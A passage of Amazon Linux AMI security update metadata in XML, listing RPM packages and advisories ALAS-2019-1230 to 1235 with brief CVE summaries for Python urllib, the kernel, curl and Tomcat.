arch="i686"><filename>Packages/php71-process-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.5-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1230</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1230: medium priority package update for python27</title><issued date="2019-06-25 21:32:00" /><updated date="2019-06-28 21:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9947:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the path component of a URL that lacks a ? character) followed by an HTTP header or a Redis command. This is similar to the CVE-2019-9740 query string issue.
1695572:
CVE-2019-9947 python: improper neutralization of CRLF sequences in urllib module
CVE-2019-9740:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the query string after a ? character) followed by an HTTP header or a Redis command.
1688169:
CVE-2019-9740 python: improper neutralization of CRLF sequences in urllib module
CVE-2019-9636:
Python 2.7.x through 2.7.16 and 3.x through 3.7.2 is affected by: Improper Handling of Unicode Encoding (with an incorrect netloc) during NFKC normalization. The impact is: Information disclosure (credentials, cookies, etc. that are cached against a given hostname). The components are: urllib.parse.urlsplit, urllib.parse.urlparse. The attack vector is: A specially crafted URL could be incorrectly parsed to locate cookies or authentication data and send that information to a different host than when parsed correctly.
1688543:
CVE-2019-9636 python: Information Disclosure due to urlsplit improper NFKC normalization
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9636" title="" id="CVE-2019-9636" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9740" title="" id="CVE-2019-9740" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9947" title="" id="CVE-2019-9947" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-test" version="2.7.16" release="1.127.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.16-1.127.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.127.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.16-1.127.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.127.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.16-1.127.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.127.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.16-1.127.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.16" release="1.127.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.16-1.127.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.16" release="1.127.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.16-1.127.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.127.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.16-1.127.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.127.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.16-1.127.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.16" release="1.127.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.16-1.127.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.127.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.16-1.127.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.16" release="1.127.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.16-1.127.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.16" release="1.127.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.16-1.127.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1232</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1232: important priority package update for kernel</title><issued date="2019-07-17 23:18:00" /><updated date="2022-09-15 03:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3900:
An infinite loop issue was found in the vhost_net kernel module while handling incoming packets in handle_rx(). The infinite loop could occur if one end sends packets faster than the other end can process them. A guest user, maybe a remote one, could use this flaw to stall the vhost_net kernel thread, resulting in a DoS scenario.
CVE-2019-13272:
A flaw was found in the way PTRACE_TRACEME functionality was handled in the Linux kernel. The kernel's implementation of ptrace can inadvertently grant elevated permissions to an attacker who can then abuse the relationship between the tracer and the process being traced. This flaw could allow a local, unprivileged user to increase their privileges on the system or cause a denial of service.
CVE-2019-11599:
A flaw was found in the Linux kernel where the coredump implementation does not use locking or other mechanisms to prevent vma layout or vma flags changes while it runs. This allows local users to obtain sensitive information, cause a denial of service (DoS), or possibly have unspecified other impact by triggering a race condition with mmget_not_zero or get_task_mm calls.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11599" title="" id="CVE-2019-11599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13272" title="" id="CVE-2019-13272" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3900" title="" id="CVE-2019-3900" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.133-88.105.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.133-88.105.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.133-88.105.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.133-88.105.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.133-88.105.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.133-88.105.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.133-88.105.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.133-88.105.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.133-88.105.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.133-88.105.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1233</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1233: low priority package update for curl</title><issued date="2019-07-17 23:19:00" /><updated date="2019-07-25 18:33:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-5436:
A heap buffer overflow in the TFTP receiving code allows for DoS or arbitrary code execution in libcurl versions 7.19.4 through 7.64.1.
1710620:
CVE-2019-5436 curl: TFTP receive heap buffer overflow in tftp_receive_packet() function
CVE-2019-5435:
An integer overflow in curl&#039;s URL API results in a buffer overflow in libcurl 7.62.0 to and including 7.64.1.
1710609:
CVE-2019-5435 curl: Integer overflows in curl_url_set() function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5435" title="" id="CVE-2019-5435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5436" title="" id="CVE-2019-5436" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl" version="7.61.1" release="11.91.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-11.91.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="11.91.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-11.91.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="11.91.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-11.91.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="11.91.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-11.91.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="11.91.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-11.91.amzn1.i686.rpm</filename></package><package name="curl" version="7.61.1" release="11.91.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-11.91.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="11.91.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-11.91.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.61.1" release="11.91.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-11.91.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1234</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1234: important priority package update for tomcat8</title><issued date="2019-07-17 23:21:00" /><updated date="2019-07-25 18:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-0221:
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.
1713275:
CVE-2019-0221 tomcat: XSS in SSI printenv
CVE-2019-0199:
The HTTP/2 implementation in Apache Tomcat 9.0.0.M1 to 9.0.14 and 8.5.0 to 8.5.37 accepted streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API&#039;s blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS.
1693325:
CVE-2019-0199 tomcat: Apache Tomcat HTTP/2 DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0199" title="" id="CVE-2019-0199" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0221" title="" id="CVE-2019-0221" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-servlet-3.1-api" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.42-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.42-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.42-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.42-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.42-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.42-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.42-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.42-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.42-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.42-1.80.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1235</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1235: low priority package update for tomcat7</title><issued date="2019-07-17 23:23:00" /><updated date="2019-07-25 18:35:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-0221:
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.
1713275:
CVE-2019-0221 tomcat: XSS in SSI printenv
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0221" title="" id="CVE-2019-0221" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-admin-webapps" version="7.0.94" release="1.35.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.94-1.35.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.94" release="1.35.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.94-1.35.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.94" release="1.35.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.94-1.35.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.94" release="1.35.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.94-1.35.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.94" release="1.35.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.94-1.35.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.94" release="1.35.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.94-1.35.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.94" release="1.35.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.94-1.35.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.94" release="1.35.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.94-1.35.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.94" release="1.35.amzn1" epoch="0" 